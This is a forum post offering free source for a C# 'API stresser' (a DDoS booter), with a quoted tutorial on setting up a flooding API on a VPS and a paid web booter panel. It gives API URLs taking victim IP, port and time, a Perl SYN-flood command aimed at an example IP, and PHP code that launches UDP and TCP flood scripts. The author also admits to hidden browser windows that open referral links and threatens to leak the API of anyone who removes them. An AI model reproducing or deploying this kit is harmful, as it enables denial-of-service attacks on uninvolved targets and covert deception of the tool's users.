CabConModding
Facebook
Twitter
youtube
Discord
Contact us
RSS
Menu
CabConModding
Home
New
Top
Premium
Rules
FAQ - Frequently Asked Questions
Games
Fornite
Call of Duty: Black Ops 3
Clash of Clans
Grand Theft Auto 5
Apex Legends
Assassin’s Creed Origins
Forums
Premium
Latest posts
What's new
Latest posts
New profile posts
Latest activity
Members
Current visitors
New profile posts
Log in
Register
What's new
Premium
Latest posts
Menu
Log in
Register
Navigation
Install the app
Install
More options
Dark Theme
Contact us
Close Menu
Forums
Tech Boards
Computer Programming
Source Code & Tutorial
[Free+Source] Profound's C# API Stresser + How to setup an API
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Message
<blockquote data-quote="Harry" data-source="post: 19436" data-attributes="member: 35"><p style="text-align: center"><span style="font-size: 26px"><span style="color: #b30059"><strong>Profound's API Booter</strong></span></span></p><p></p><p style="text-align: center"><img src="http://i.imgur.com/oiKDc4V.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p><strong><span style="font-size: 15px"><span style="color: #000000">[1] Introduction</span></span></strong></p><p><strong><span style="font-size: 15px"><span style="color: #000000">[2] How to setup & use</span></span></strong></p><p><strong><span style="font-size: 15px"><span style="color: #000000">[3] Installing an API to a VPS</span></span></strong></p><p><strong><span style="font-size: 15px"><span style="color: #000000">[4] Information, License & Credits</span></span></strong></p><p><strong><span style="font-size: 15px"><span style="color: #000000"></span></span></strong></p><p><strong><span style="font-size: 15px"><span style="color: #000000"></span></span></strong></p><p><strong><span style="font-size: 15px"><span style="color: #000000"><u>Introduction</u></span></span></strong></p><p><span style="font-size: 15px"><span style="color: #000000">This is a simple C# (.NET) API stresser. This, from source, will not stresser instantly. You will need an API (Application Program Interface) to be able to send an attack, and use the appropriate methods in order to send the attack.</span></span></p><p></p><p></p><p><span style="color: #000000"><strong><u>How to setup & use</u></strong></span></p><p><span style="color: #000000">Download: <a href="https://www.mediafire.com/?msd4j1s2a5ozwk6" target="_blank">API Booter by Daddy ProfoundModz</a></span></p><p><span style="color: #000000">Virus Scan: No .exe's in the download, but I work on a 'no trust, no use' basis. You're the one missing the opportunity, unlike me. So jokes on you <img src="/styles/default/xenforo/smilies.emoji/people/stuck_out_tongue_winking_eye.emoji.svg" class="smilie" loading="lazy" alt=":tonguewink:" title="Tongue Wink :tonguewink:" data-shortname=":tonguewink:" /></span></p><p><span style="color: #000000"></span></p><p><span style="color: #000000">You will need Visual Studio 2013 in order to start editing this tool.</span></p><p><span style="color: #000000">First, you will need to edit the MAX time to your liking:</span></p><p><span style="color: #000000">[spoiler=Image]</span></p><p><span style="color: #000000"><img src="http://i.imgur.com/qkC80Cb.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></span></p><p><span style="color: #000000">[/spoiler]</span></p><p><span style="color: #000000">Then you will need to edit the link that will send the command to start the attack:</span></p><p><span style="color: #000000">[spoiler=Image]</span></p><p><span style="color: #000000"><img src="http://i.imgur.com/kL7HktJ.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></span></p><p><span style="color: #000000">[/spoiler]</span></p><p><span style="color: #000000"></span></p><p><span style="color: #000000">Match your Booters API with the 'wildcards' and the code below</span></p><p><span style="color: #000000"></span></p><p><span style="color: #000000">[spoiler={1}]</span></p><p><span style="color: #000000">[CODE]MyBooter.com/api.php?IP=&PORT=&TIME=[/CODE]</span></p><p><span style="color: #000000">[CODE]MyBooter.com/api.php?IP="+textBox1.Text+"&PORT="+textBox2.Text+"&TIME="+label4.Text[/CODE]</span></p><p><span style="color: #000000">[/spoiler]</span></p><p></p><p><span style="color: #000000">[spoiler={2}]</span></p><p><span style="color: #000000">[CODE]MyBooter.com/api.php?APIKey=Key&IP=&PORT=&TIME=[/CODE][/spoiler]</span>[spoiler={2}]</p><p>[CODE]MyBooter.com/api.php?APIKey=Key&IP="+textBox1.Text+"&PORT="+textBox2.Text+"&TIME="+label4.Text</p><p>[/CODE]</p><p>[/spoiler]</p><p></p><p>[spoiler={3}]</p><p>[CODE]MyBooter.com/api.php?APIKey=Key&IP=&PORT=&TIME=&METHOD=[/CODE]</p><p>[CODE]MyBooter.com/api.php?APIKey=Key&IP="+textBox1.Text+"&PORT="+textBox2.Text+"&TIME="+label4.Text+"METHOD="+comboBox1.Text[/CODE]</p><p>[/spoiler]</p><p></p><p>Wildcards;</p><p>[CODE]"+ textBox1.Text +" = IP</p><p>"+ textBox2.Text +" = PORT</p><p>"+ label4.Text +" = TIME</p><p>"+ comboBox1.Text +" = METHOD[/CODE]</p><p></p><p></p><p><strong><u>Installing an API to a VPS</u></strong></p><p>The following text is from a user on hackforums:</p><p>[spoiler=Installing an API to a VPS]</p><p>Requirements:</p><p>Putty, Winscp, APIs, centos 6 installed on a vps or a dedicated server(accepting ddos because you could be banned), a webhost for your booter.</p><p></p><p>i found these website for your centos server:</p><p></p><p>Hostkey</p><p>VpsGet</p><p>Ecatel</p><p>Ampnode</p><p>Blazingfast</p><p>Offshoresrv</p><p></p><p>my installation is a dedi on kimsufi (ovh)</p><p></p><p>first login to your vps/dedi with putty on your server.</p><p>root/password</p><p></p><p>login with winscp to your server.</p><p>go to /root/</p><p></p><p>download, extract and upload the 5 files in /root/.</p><p>Code:</p><p>mediafire.com/download/ckx98fryya1f8bg/api_script_auto_install.rar</p><p></p><p>go to your putty program and type:</p><p>Code:</p><p>cd /root/</p><p>perl setup.pl</p><p></p><p>say yes all the time when it ask for download.</p><p></p><p>your api should be installed when finished.</p><p></p><p>ssyn.pl is a simple perl flooder.</p><p></p><p>Code:</p><p>perl /root/ssyn.pl victimip port sizeofpacket time</p><p>example: perl /root/ssyn.pl 8.8.8.8 80 50000 60</p><p></p><p>now, just go to :</p><p>Code:</p><p>yourvpsip/api.php</p><p>and see if it works.</p><p></p><p>now we have to add the apikey, the host, the port, the time, and the method.</p><p></p><p>Code:</p><p>yourvpsip/api.php?key=apikey&host=victimip&port=80&time=60&method=udp</p><p></p><p>try to ddos your own ip by replacing "victimip" by your own ip address and see if u are ddosed <img src="/styles/default/xenforo/smilies.emoji/people/smile.emoji.svg" class="smilie" loading="lazy" alt=":grinning:" title="Grinning :grinning:" data-shortname=":grinning:" /></p><p>you can also install dstat on your server, and see if your attacks works.</p><p></p><p>Code:</p><p>yum install dstat</p><p>dstat --net</p><p></p><p>the api is done.</p><p></p><p>------------------------------------</p><p></p><p>now you have to make your web booter.</p><p></p><p>use notepad++ for editing file on windows.</p><p></p><p>Download Booter source gemini (thanks to Zoom):</p><p>Code:</p><p>mediafire.com/download/8bkcdkrjwt5r2ea/source.rar</p><p></p><p>find a good webhost or free subdomain with php, mysql, phpmyadmin.</p><p>i use a free webhost at "hostinger" (but they can ban so its your choice)</p><p></p><p>create a sql database on your panel and keep the informations "db_host, db_name, db_username, db_server"</p><p></p><p>go to the folder sql table (in the rar file downloaded), put sql.sql in your database</p><p>how to do that? just connect to phpmyadmin on your panel and select your database, go to insert and upload sql.sql, then clic execute.</p><p></p><p>now go to your booter folder downloaded before and edit /include/db.php with your informations concording to your sql database created before on your panel.</p><p></p><p>take the ftp informations of your website (ftp server, ftp user, ftp pass)</p><p>use filezilla or winscp, connect to your ftp account.</p><p>send all the files in the rar file on the root path of your website.</p><p>excepted the folder SQL table which contains the sql database.</p><p></p><p>when upload is finished, go to your website URL adress.</p><p></p><p>register an account, create a admin user (admin)</p><p>and connect to your booter with login page.</p><p></p><p>then , return to your phpmyadmin on the panel.</p><p></p><p>go to your database, find "users", find your nickname (created before when registered)</p><p>click modify and put rank from 0 to 1</p><p>it will change your status from user to admin.</p><p></p><p>reconnect to your website or just refresh</p><p>you will see "admin" button in the menu.</p><p></p><p>click on this, go to plans.</p><p></p><p>create a new plan</p><p></p><p>plan name: e.g boot plan 1</p><p>description: e.g boot 300sec</p><p>max boot time: 300</p><p>unit: month or whatever u want</p><p>plan lenght: 1 or 2 (month, days ..)</p><p>plan price: 5</p><p></p><p>then press add.</p><p></p><p>go to "manage users", edit, plan, select your plan 'boot plan 1"</p><p>press update.</p><p></p><p>now the most important thing(never explained in all tutorial on HF .. stupid..), is to add your api created on your vps to your website.</p><p>go to admin, servers</p><p></p><p>just insert your vps ip + api.php here:</p><p>Code:</p><p>yourvpsip/api.php</p><p></p><p>and click addservers.</p><p></p><p>go to blacklist, and blacklist <a href="https://hackforums.net/ipcheck.php?action=iplookup&ipaddress=127.0.0.1" target="_blank">127.0.0.1</a>, yourvpsipadress, and your website ip.</p><p></p><p>note: if you want to modify something in the source about api,</p><p>edit hub.php</p><p></p><p>api url from booter source(hub.php):</p><p>Code:</p><p>$url = $r["url"]."?key=apikey&host={$host}&port={$port}&time={$time}&method={$method}";</p><p></p><p>concording with the api url:</p><p>api source:</p><p>Code:</p><p>pastebin.com/JK1GXFgi</p><p></p><p>$r["url"]." will be replaced with your server added before</p><p>key=apikey is the key (not changed in api.php)</p><p>host={$host} is the victim ip (same in api.php)</p><p>port={$port} is the port flooded of victim (same in api.php)</p><p>time={$time} is the time of the attack</p><p>method={$method} is the method</p><p></p><p>the method is choosen concording with the source in hub.php and api.php</p><p></p><p>hub.php source:</p><p>Code:</p><p>option value="udp">UDP Flood (Only this one work)</p><p>option value="tcp">TCP Flood</p><p>is the method in menu hub.</p><p></p><p>value "udp" will change the method value ( {$method} ) who will be replaced in the api url from booter > vps api.</p><p></p><p><img src="https://hackforums.net/images/smilies/biggrin.gif" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>you can add more scripts by adding in your api.php a new method with the commandline pointing to a new flood script , but it must be concording with the method on ur website and ur api..</p><p></p><p>api.php:</p><p>Code:</p><p>$array = array("udp", "tcp", "stop");// Add you're existing methods here, and delete you're none existent methods.</p><p>$ray = array("apikey");</p><p></p><p>------</p><p></p><p>if ($method == "udp") { $command = "screen -dm perl /root/ssyn.pl $host $port 50000 $time"; }</p><p>if ($method == "tcp") { $command = "screen -dm /root/tcp $host 8 300000 $time"; }</p><p>if ($method == "stop") { $command = "pkill $host -f"; }</p><p></p><p>now you have to edit 3 files:</p><p>index.php</p><p>admin/sidebar.php</p><p>includes/init.php</p><p></p><p>edit the files and search "yourwebsite.com", and replace it by your own website url. dont change the PHP files in the URL</p><p></p><p>then try your flood attack</p><p>just click on hub in the menu and send the attack. <img src="https://hackforums.net/images/smilies/pirate.gif" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>note: I have not added spoofed script(just a basic perl flooder) because my dedi is not spoofed but i'll make a tutorial on this when i'll have a spoofed server</p><p>[/spoiler]</p><p></p><p></p><p><strong><u>Information, License & Credits</u></strong></p><p>So I have one rule or you'll get your API leaked:</p><p>*IF* you are going to sell and release this I have 2 webBroswers (Hidden behind the groupBox) that open referal links to pages for me to get points on. If you remove this feature, you will have your API leaked.</p><p>Credit me for tool source if you use it...</p><p></p><p>Credits:</p><p>Me (Harry/Profound)</p><p>NOOB1234 (Hackforums - Creating the API on VPS tutorial)</p><p></p><p>Any other issues, feel free to comment *or* private message me and I will be sure to assist you quicker <img src="/styles/default/xenforo/smilies.emoji/people/smile.emoji.svg" class="smilie" loading="lazy" alt=":grinning:" title="Grinning :grinning:" data-shortname=":grinning:" /></p><p></p><p>~ Harry</p></blockquote><p></p>
[QUOTE="Harry, post: 19436, member: 35"] [CENTER][SIZE=7][COLOR=#b30059][B]Profound's API Booter[/B][/COLOR][/SIZE][/CENTER] [CENTER][IMG]http://i.imgur.com/oiKDc4V.png[/IMG][/CENTER] [B][SIZE=4][COLOR=#000000][1] Introduction [2] How to setup & use [3] Installing an API to a VPS [4] Information, License & Credits [U]Introduction[/U][/COLOR][/SIZE][/B] [SIZE=4][COLOR=#000000]This is a simple C# (.NET) API stresser. This, from source, will not stresser instantly. You will need an API (Application Program Interface) to be able to send an attack, and use the appropriate methods in order to send the attack.[/COLOR][/SIZE] [COLOR=#000000][B][U]How to setup & use[/U][/B] Download: [URL='https://www.mediafire.com/?msd4j1s2a5ozwk6']API Booter by Daddy ProfoundModz[/URL] Virus Scan: No .exe's in the download, but I work on a 'no trust, no use' basis. You're the one missing the opportunity, unlike me. So jokes on you :tonguewink: You will need Visual Studio 2013 in order to start editing this tool. First, you will need to edit the MAX time to your liking: [spoiler=Image] [IMG]http://i.imgur.com/qkC80Cb.png[/IMG] [/spoiler] Then you will need to edit the link that will send the command to start the attack: [spoiler=Image] [IMG]http://i.imgur.com/kL7HktJ.png[/IMG] [/spoiler] Match your Booters API with the 'wildcards' and the code below [spoiler={1}] [CODE]MyBooter.com/api.php?IP=&PORT=&TIME=[/CODE] [CODE]MyBooter.com/api.php?IP="+textBox1.Text+"&PORT="+textBox2.Text+"&TIME="+label4.Text[/CODE] [/spoiler][/COLOR] [COLOR=#000000][spoiler={2}] [CODE]MyBooter.com/api.php?APIKey=Key&IP=&PORT=&TIME=[/CODE][/spoiler][/COLOR][spoiler={2}] [CODE]MyBooter.com/api.php?APIKey=Key&IP="+textBox1.Text+"&PORT="+textBox2.Text+"&TIME="+label4.Text [/CODE] [/spoiler] [spoiler={3}] [CODE]MyBooter.com/api.php?APIKey=Key&IP=&PORT=&TIME=&METHOD=[/CODE] [CODE]MyBooter.com/api.php?APIKey=Key&IP="+textBox1.Text+"&PORT="+textBox2.Text+"&TIME="+label4.Text+"METHOD="+comboBox1.Text[/CODE] [/spoiler] Wildcards; [CODE]"+ textBox1.Text +" = IP "+ textBox2.Text +" = PORT "+ label4.Text +" = TIME "+ comboBox1.Text +" = METHOD[/CODE] [B][U]Installing an API to a VPS[/U][/B] The following text is from a user on hackforums: [spoiler=Installing an API to a VPS] Requirements: Putty, Winscp, APIs, centos 6 installed on a vps or a dedicated server(accepting ddos because you could be banned), a webhost for your booter. i found these website for your centos server: Hostkey VpsGet Ecatel Ampnode Blazingfast Offshoresrv my installation is a dedi on kimsufi (ovh) first login to your vps/dedi with putty on your server. root/password login with winscp to your server. go to /root/ download, extract and upload the 5 files in /root/. Code: mediafire.com/download/ckx98fryya1f8bg/api_script_auto_install.rar go to your putty program and type: Code: cd /root/ perl setup.pl say yes all the time when it ask for download. your api should be installed when finished. ssyn.pl is a simple perl flooder. Code: perl /root/ssyn.pl victimip port sizeofpacket time example: perl /root/ssyn.pl 8.8.8.8 80 50000 60 now, just go to : Code: yourvpsip/api.php and see if it works. now we have to add the apikey, the host, the port, the time, and the method. Code: yourvpsip/api.php?key=apikey&host=victimip&port=80&time=60&method=udp try to ddos your own ip by replacing "victimip" by your own ip address and see if u are ddosed :grinning: you can also install dstat on your server, and see if your attacks works. Code: yum install dstat dstat --net the api is done. ------------------------------------ now you have to make your web booter. use notepad++ for editing file on windows. Download Booter source gemini (thanks to Zoom): Code: mediafire.com/download/8bkcdkrjwt5r2ea/source.rar find a good webhost or free subdomain with php, mysql, phpmyadmin. i use a free webhost at "hostinger" (but they can ban so its your choice) create a sql database on your panel and keep the informations "db_host, db_name, db_username, db_server" go to the folder sql table (in the rar file downloaded), put sql.sql in your database how to do that? just connect to phpmyadmin on your panel and select your database, go to insert and upload sql.sql, then clic execute. now go to your booter folder downloaded before and edit /include/db.php with your informations concording to your sql database created before on your panel. take the ftp informations of your website (ftp server, ftp user, ftp pass) use filezilla or winscp, connect to your ftp account. send all the files in the rar file on the root path of your website. excepted the folder SQL table which contains the sql database. when upload is finished, go to your website URL adress. register an account, create a admin user (admin) and connect to your booter with login page. then , return to your phpmyadmin on the panel. go to your database, find "users", find your nickname (created before when registered) click modify and put rank from 0 to 1 it will change your status from user to admin. reconnect to your website or just refresh you will see "admin" button in the menu. click on this, go to plans. create a new plan plan name: e.g boot plan 1 description: e.g boot 300sec max boot time: 300 unit: month or whatever u want plan lenght: 1 or 2 (month, days ..) plan price: 5 then press add. go to "manage users", edit, plan, select your plan 'boot plan 1" press update. now the most important thing(never explained in all tutorial on HF .. stupid..), is to add your api created on your vps to your website. go to admin, servers just insert your vps ip + api.php here: Code: yourvpsip/api.php and click addservers. go to blacklist, and blacklist [URL='https://hackforums.net/ipcheck.php?action=iplookup&ipaddress=127.0.0.1']127.0.0.1[/URL], yourvpsipadress, and your website ip. note: if you want to modify something in the source about api, edit hub.php api url from booter source(hub.php): Code: $url = $r["url"]."?key=apikey&host={$host}&port={$port}&time={$time}&method={$method}"; concording with the api url: api source: Code: pastebin.com/JK1GXFgi $r["url"]." will be replaced with your server added before key=apikey is the key (not changed in api.php) host={$host} is the victim ip (same in api.php) port={$port} is the port flooded of victim (same in api.php) time={$time} is the time of the attack method={$method} is the method the method is choosen concording with the source in hub.php and api.php hub.php source: Code: option value="udp">UDP Flood (Only this one work) option value="tcp">TCP Flood is the method in menu hub. value "udp" will change the method value ( {$method} ) who will be replaced in the api url from booter > vps api. [IMG]https://hackforums.net/images/smilies/biggrin.gif[/IMG] you can add more scripts by adding in your api.php a new method with the commandline pointing to a new flood script , but it must be concording with the method on ur website and ur api.. api.php: Code: $array = array("udp", "tcp", "stop");// Add you're existing methods here, and delete you're none existent methods. $ray = array("apikey"); ------ if ($method == "udp") { $command = "screen -dm perl /root/ssyn.pl $host $port 50000 $time"; } if ($method == "tcp") { $command = "screen -dm /root/tcp $host 8 300000 $time"; } if ($method == "stop") { $command = "pkill $host -f"; } now you have to edit 3 files: index.php admin/sidebar.php includes/init.php edit the files and search "yourwebsite.com", and replace it by your own website url. dont change the PHP files in the URL then try your flood attack just click on hub in the menu and send the attack. [IMG]https://hackforums.net/images/smilies/pirate.gif[/IMG] note: I have not added spoofed script(just a basic perl flooder) because my dedi is not spoofed but i'll make a tutorial on this when i'll have a spoofed server [/spoiler] [B][U]Information, License & Credits[/U][/B] So I have one rule or you'll get your API leaked: *IF* you are going to sell and release this I have 2 webBroswers (Hidden behind the groupBox) that open referal links to pages for me to get points on. If you remove this feature, you will have your API leaked. Credit me for tool source if you use it... Credits: Me (Harry/Profound) NOOB1234 (Hackforums - Creating the API on VPS tutorial) Any other issues, feel free to comment *or* private message me and I will be sure to assist you quicker :grinning: ~ Harry [/QUOTE]
Verification
Post reply
Forums
Tech Boards
Computer Programming
Source Code & Tutorial
[Free+Source] Profound's C# API Stresser + How to setup an API
This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
By continuing to use this site, you are consenting to our use of cookies.
Accept
Learn more…
Top